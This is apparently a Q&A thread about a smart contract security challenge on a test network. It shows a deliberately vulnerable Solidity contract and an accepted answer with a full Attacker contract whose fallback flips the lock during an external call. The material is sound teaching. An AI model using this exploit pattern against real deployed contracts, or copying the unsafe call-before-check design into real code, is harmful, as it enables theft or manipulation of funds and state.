# How do I add my address to a deployed contract array using a security exploit? (coding challenge)

Tags: contract-design, contract-invocation, contract-debugging

I'm working on a coding challenge for smart contract security exploits. I need to add my address to an array (winners) in the contract.  Do I need to create another contract that inherits the original contract and calls one of the functions? Or somehow set the lock variable to true?

[Click here for contract on Etherscan](https://goerli.etherscan.io/address/0xcD7AB80Da7C893f86fA8deDDf862b74D94f4478E#code)

```
pragma solidity 0.8.10;

// The goal of this challenge is to be able to sign offchain a message
// with an address stored in winners.
contract Challenge{

    address[] public winners;
    bool lock;

    function exploit_me(address winner) public{
        lock = false;

        msg.sender.call("");

        require(lock);
        winners.push(winner);
    }

    function lock_me() public{
        lock = true;
    }
}
```

Comment: Well  i don't wanna give out the  answer, but that's a reentrancy attack. It's fairly simple, look at what the conditions to add your address to the winner array are, and work from there :)

Comment: (and yes, you need to create a smart contract to do that.)

Comment: @Foxxxey, no need to use Reentrancy here. Although it looks like reentrancy, it's not, but cause the `fallback` function will not call the `exploit_me` function again, so it's not really 'reentering'. It will call the `lock_me()` function instead.

Comment: True, i thought that counted as "reentrancy" but that makes sense haha. So it's reentrancy only if you reenter the same function?

Comment: But the task says that you have to sign offchain a message with an address stored in winners. I quite do not understand how to sign it and where should it be sent.

Comment: I don't understand, why do you need an exploit? lock_me is public and can just be called before calling exploit_me, what would be the problem then?

Answer (score 2, accepted):

It is easier than it seems.

Logic: Create another contract that calls `exploit_me` function of the `Challenge` contract. Since that function is making this call `msg.sender.call("");` to the caller, it will call a `fallback` function declared in your solution contract. You will implement a fallback function that calls the `lock_me()` function. In your new contract, you will need to create a function to start the attack, sending it a custom address (your address probably).

Try to solve it on your own. If you can't, then take a look at my solution below:

```js
//SPDX-License-Identifier: MIT
pragma solidity ^0.8.7;

contract Attacker {

    Challenge challenge;

    function updateChallengeAddress(address challengeAddress) public {
        challenge = Challenge(challengeAddress);
    }

    function attack(address winner) public {
        challenge.exploit_me(winner);
    }

    // The `msg.sender.call("");` in the `Challenge` contract will call this fallback function
    // and we are going to `lock` it before the `exploin_me` continues.
    fallback() external {
        challenge.lock_me();
    }

}

contract Challenge {

    address[] public winners;
    bool lock;

    function exploit_me(address winner) public {
        lock = false;

        msg.sender.call("");

        require(lock);
        winners.push(winner);
    }

    function lock_me() public{
        lock = true;
    }
}
```

Comment: Thank you for the response.  Is there anything unique I need to do if I want to deploy in remix? I noticed it separates the contracts in deployment even if they are part of the same file. I was trying to do it by clicking "At address" with the original contract address.

Comment: No. After deploying, just remember to call the `updateChallengeAddress` with the address of the deployed `Challenge` contract, before calling the `attack` function.